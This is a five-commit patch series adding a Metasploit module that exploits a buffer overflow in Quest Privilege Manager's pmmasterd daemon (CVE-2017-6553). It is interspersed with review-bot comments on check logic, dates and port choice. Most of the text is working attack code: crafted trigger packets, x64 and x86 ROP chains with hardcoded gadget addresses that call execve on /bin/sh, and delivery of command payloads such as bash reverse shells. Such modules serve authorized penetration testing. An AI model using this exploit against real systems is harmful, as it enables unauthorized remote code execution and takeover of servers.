From 9a0789f839b7d1a7245dd29c48e457bd257e963f Mon Sep 17 00:00:00 2001
From: m0t
Date: Wed, 5 Apr 2017 17:59:54 +0100
Subject: [PATCH 1/5] Exploit for pmmasterd Buffer Overflow (CVE-2017-6553)
---
 .../linux/misc/quest_pmmasterd_bof.rb | 202 ++++++++++++++++++
 1 file changed, 202 insertions(+)
 create mode 100644 modules/exploits/linux/misc/quest_pmmasterd_bof.rb
diff --git a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
new file mode 100644
index 0000000000..4a10111a35
--- /dev/null
+++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
@@ -0,0 +1,202 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Quest Privilege Manager pmmasterd Buffer Overflow',
+ 'Description' => %q{
+ This modules exploits a buffer overflow in the Quest Privilege Manager,
+ a software used to integrate Active Directory with Linux and Unix systems.
+ The vulnerability exists in the pmmasterd daemon, and can only triggered when
+ the host has been configured as a policy server ( Privilege Manager for Unix
+ or Quest Sudo Plugin). A buffer overflow condition exists when handling
+ requests of type ACT_ALERT_EVENT, where the size of a memcpy can be
+ controlled by the attacker. This module only works against version < 6.0.0-27.
+ Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (stack cookies bypass is required).
+ },
+ 'Author' =>
+ [
+ 'm0t'
+ ],
+ 'References' =>
+ [
+ ['CVE', '2017-6553']
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "",
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic python perl ruby openssl bash-tcp'
+ }
+ },
+ 'Arch' => ARCH_CMD,
+ 'Platform' => 'unix',
+ 'Targets' =>
+ [
+ ['Quest Privilege Manager pmmasterd 6.0.0-27 x64',
+ {
+ :exploit => :exploit_x64,
+ :check => :check_x64
+ }
+ ],
+ ['Quest Privilege Manager pmmasterd 6.0.0-27 x86',
+ {
+ :exploit => :exploit_x86,
+ :check => :check_x86
+ }
+ ]
+ ],
+ 'Privileged' => false, #XXX
+ 'DisclosureDate' => 'Apr 09 2017',
+ 'DefaultTarget' => 1
+ ))
+
+ register_options([ Opt::RPORT(12345) ], self.class)
+ register_options( [ Opt::CPORT(rand(1024))], self.class )
+ end
+
+ #definitely not stealthy! sends a crashing request, if the socket dies, or the output is partial it assumes the target has crashed. Although the daemon spawns a new process for each connection, the segfault will appear on syslog
+ def check
+ unless self.respond_to?(target[:check], true)
+ fail_with(Failure::NoTarget, "Invalid target specified")
+ end
+
+ return self.send(target[:check])
+ end
+
+ def exploit
+ unless self.respond_to?(target[:exploit], true)
+ fail_with(Failure::NoTarget, "Invalid target specified")
+ end
+
+ request = self.send(target[:exploit])
+
+ connect
+ print_status("Sending trigger")
+ sock.put(request)
+ sock.get_once
+ print_status("Sending payload")
+ sock.put(payload.encoded)
+ disconnect
+ end
+
+ #server should crash after parsing the packet, partial output is returned
+ def check_x64
+ head = [ 0x26c ].pack("N")
+ head << [ 0x700 ].pack("N")
+ head << [ 0x700 ].pack("N")
+ head << "\x00"*68
+
+ body = "PingE4.6 .0.0.27"
+ body << rand_text_alpha(3000)
+
+ request = head + body
+
+ connect
+ print_status("Sending trigger")
+ sock.put(request)
+ res = sock.timed_read(1024, 1)
+ if res.match("Pong4$")
+ return Exploit::CheckCode::Appears
+ else
+ return Exploit::CheckCode::Unknown
+ end
+ end
+
+ #server should crash while parsing the packet, with no output
+ def check_x86
+ head = [ 0x26c ].pack("N")
+ head << [ 0x700 ].pack("N")
+ head << [ 0x700 ].pack("N")
+ head << "\x00"*68
+
+ body = rand_text_alpha(3000)
+
+ request = head + body
+
+ connect
+ print_status("Sending trigger")
+ sock.put(request)
+ begin
+ res = sock.timed_read(1024, 1)
+ return Exploit::CheckCode::Unknown
+ rescue ::Exception
+ return Exploit::CheckCode::Appears
+ end
+ end
+
+ def exploit_x64
+ head = [ 0x26c ].pack("N")
+ head << [ 0x700 ].pack("N")
+ head << [ 0x700 ].pack("N")
+ head << "\x00"*68
+
+ #rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)
+ ropchain = [
+ 0x408f88, # pop rdi, ret
+ 0x4FA215, # /bin/sh
+ 0x40a99e, # pop rsi ; ret
+ 0, # argv @rsi
+ 0x40c1a0, # pop rax, ret
+ 0, # envp @rax
+ 0x48c751, # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret
+ 0xcacc013, # padd
+ 0x408a98, # execve,
+ 0
+ ].pack("Q*")
+
+ body = "PingE4.6 .0.0.27" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES
+ body << rand_text_alpha(1600)
+ body << ropchain
+ body << rand_text_alpha(0x700 - body.size())
+
+ return head + body
+
+ end
+
+ def exploit_x86
+ head = [ 0x26c ].pack("N")
+ head << [ 0x108 ].pack("N")
+ head << [ 0xcc ].pack("N")
+ head << "\x00"*68
+
+ #rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)
+ ropchain = [
+ 0x8093262, # ret
+ 0x73, # cs reg
+ 0x804AE2C, # execve,
+ 0xcacc013, # padding
+ 0x8136CF0, # /bin/sh
+ 0,
+ 0
+ ].pack("V*")
+
+ pivotback = 0x08141223 # sub esp, ebx ; retf
+ writable = 0x81766f8 # writable loc
+
+ body = "PingE4.6 .0.0.27" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES
+ body << rand_text_alpha(104)
+ body << ropchain
+ body << rand_text_alpha(0xb4 - body.size())
+ body << [0x50].pack("V")
+ body << rand_text_alpha(0xc4 - body.size())
+ body << [pivotback].pack("V")
+ body << [writable].pack("V")
+ body << rand_text_alpha(0x108 - body.size())
+
+ return head + body
+ end
+
+end
+
From 374d7809b574d285f0bd1dced3d35fe584cea229 Mon Sep 17 00:00:00 2001
From: m0t
Date: Tue, 11 Apr 2017 09:48:57 +0100
Subject: [PATCH 2/5] last fixes and tests
---
 modules/exploits/linux/misc/quest_pmmasterd_bof.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
index 4a10111a35..b1490bd6af 100644
--- a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
+++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
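Review bot: `check_x64` can raise instead of returning a CheckCode — when nothing arrives within the 1-second window, `sock.timed_read(1024, 1)` appears (from Rex::IO::Stream) to return nil, so `res.match("Pong4$")` fails with NoMethodError; `if res && res.match("Pong4$")` keeps the `Unknown` path reachable, and anchoring with `\z` rather than `$` avoids matching a `Pong4` line in the middle of a longer reply. `check_x86` has the inverse weakness: `rescue ::Exception` also catches Interrupt, Timeout and plain Ruby errors, every one of which is then reported as `Appears`; narrow it to the socket failures a crashed child actually produces, e.g. `rescue ::EOFError, ::Errno::ECONNRESET, ::Errno::EPIPE, ::Rex::ConnectionError`. Neither check method calls `disconnect` (compare `exploit`), so the socket is left open on every return path. In `check_x86` the `res` assigned from `timed_read` is never read; `sock.timed_read(1024, 1)` on its own says what is intended.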
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
 or Quest Sudo Plugin). A buffer overflow condition exists when handling
 requests of type ACT_ALERT_EVENT, where the size of a memcpy can be
 controlled by the attacker. This module only works against version < 6.0.0-27.
- Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (stack cookies bypass is required).
+ Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (a stack cookie bypass is required).
 },
 'Author' =>
 [
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote
 ],
 'References' =>
 [
- ['CVE', '2017-6553']
+ ['CVE', '2017-6553'],
+ ['URL' , 'https://0xdeadface.wordpress.com/2017/04/07/multiple-vulnerabilities-in-quest-privilege-manager-6-0-0-xx-cve-2017-6553-cve-2017-6554/']
 ],
 'Payload' =>
 {
@@ -57,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
 }
 ]
 ],
- 'Privileged' => false, #XXX
+ 'Privileged' => true,
 'DisclosureDate' => 'Apr 09 2017',
 'DefaultTarget' => 1
 ))
From 5e42dde6b62fd1487539c1c822bba7ebfcd15c50 Mon Sep 17 00:00:00 2001
From: m0t
Date: Wed, 12 Apr 2017 16:25:21 +0100
Subject: [PATCH 3/5] msftidy clean up
---
 modules/exploits/linux/misc/quest_pmmasterd_bof.rb | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
index b1490bd6af..b4f0db4c3a 100644
--- a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
+++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
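Review bot: The `DisclosureDate` kept as context in the third hunk, `'Apr 09 2017'`, is later than the date carried in the advisory URL the second hunk adds (`/2017/04/07/`); if that post is the public disclosure the field should read `'Apr 07 2017'`, otherwise a reference that supports Apr 09 would settle it. Minor style in the same hunk: `['URL' , 'https://...']` has a space before the comma, unlike the `['CVE', '2017-6553'],` entry directly above it. The `initialize` these hunks belong to starts and ends outside them.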
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
 This modules exploits a buffer overflow in the Quest Privilege Manager,
 a software used to integrate Active Directory with Linux and Unix systems.
 The vulnerability exists in the pmmasterd daemon, and can only triggered when
- the host has been configured as a policy server ( Privilege Manager for Unix
+ the host has been configured as a policy server ( Privilege Manager for Unix
 or Quest Sudo Plugin). A buffer overflow condition exists when handling
 requests of type ACT_ALERT_EVENT, where the size of a memcpy can be
 controlled by the attacker. This module only works against version < 6.0.0-27.
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
 },
 'Arch' => ARCH_CMD,
 'Platform' => 'unix',
- 'Targets' =>
+ 'Targets' =>
 [
 ['Quest Privilege Manager pmmasterd 6.0.0-27 x64',
 {
@@ -67,12 +67,12 @@ class MetasploitModule < Msf::Exploit::Remote
 register_options( [ Opt::CPORT(rand(1024))], self.class )
 end

- #definitely not stealthy! sends a crashing request, if the socket dies, or the output is partial it assumes the target has crashed. Although the daemon spawns a new process for each connection, the segfault will appear on syslog
+ #definitely not stealthy! sends a crashing request, if the socket dies, or the output is partial it assumes the target has crashed. Although the daemon spawns a new process for each connection, the segfault will appear on syslog
 def check
 unless self.respond_to?(target[:check], true)
 fail_with(Failure::NoTarget, "Invalid target specified")
 end
-
+
 return self.send(target[:check])
 end

@@ -149,10 +149,10 @@ class MetasploitModule < Msf::Exploit::Remote
 0x4FA215, # /bin/sh
 0x40a99e, # pop rsi ; ret
 0, # argv @rsi
- 0x40c1a0, # pop rax, ret
+ 0x40c1a0, # pop rax, ret
 0, # envp @rax
 0x48c751, # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret
- 0xcacc013, # padd
+ 0xcacc013, # padding
 0x408a98, # execve,
 0
 ].pack("Q*")
From 4f12a1e271cd614497a32e666d976672703019af Mon Sep 17 00:00:00 2001
From: m0t
Date: Sun, 7 May 2017 13:54:28 +0100
Subject: [PATCH 4/5] added note to description
---
 modules/exploits/linux/misc/quest_pmmasterd_bof.rb | 1 +
 1 file changed, 1 insertion(+)
diff --git a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
index b4f0db4c3a..761e7a023f 100644
--- a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
+++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
@@ -22,6 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
 requests of type ACT_ALERT_EVENT, where the size of a memcpy can be
 controlled by the attacker. This module only works against version < 6.0.0-27.
 Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (a stack cookie bypass is required).
+ NOTE: To use this module it is required to be able to bind a privileged port ( <=1024 ) as the server refuses connections coming from unprivileged ports, which in most situations means that root privileges are required.
 },
 'Author' =>
 [
From ab245b50422dcb25f933fe7db6fd49e85959aa49 Mon Sep 17 00:00:00 2001
From: m0t
Date: Sun, 7 May 2017 13:56:50 +0100
Subject: [PATCH 5/5] added note to description
---
 modules/exploits/linux/misc/quest_pmmasterd_bof.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
index 761e7a023f..8bb3e9af6c 100644
--- a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
+++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
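Review bot: The added NOTE describes a requirement the module's own default does not reliably meet: `Opt::CPORT(rand(1024))` in `initialize` (outside this hunk) picks from 0..1023, and a CPORT of 0 asks the kernel for an ephemeral, unprivileged source port — exactly what the note says pmmasterd rejects — while any non-zero pick can collide with a port already bound on the attacking host. `Opt::CPORT(rand(1..1023))` removes the 0 case, and the NOTE could add that CPORT can be set by hand when the random choice fails to bind. The bound quoted in the note is also off by one: privileged ports are those below 1024, so `( <1024 )` or `( <=1023 )`.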
@@ -22,7 +22,9 @@ class MetasploitModule < Msf::Exploit::Remote
 requests of type ACT_ALERT_EVENT, where the size of a memcpy can be
 controlled by the attacker. This module only works against version < 6.0.0-27.
 Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (a stack cookie bypass is required).
- NOTE: To use this module it is required to be able to bind a privileged port ( <=1024 ) as the server refuses connections coming from unprivileged ports, which in most situations means that root privileges are required.
+ NOTE: To use this module it is required to be able to bind a privileged port ( <=1024 )
+ as the server refuses connections coming from unprivileged ports, which in most situations
+ means that root privileges are required.
 },
 'Author' =>
 [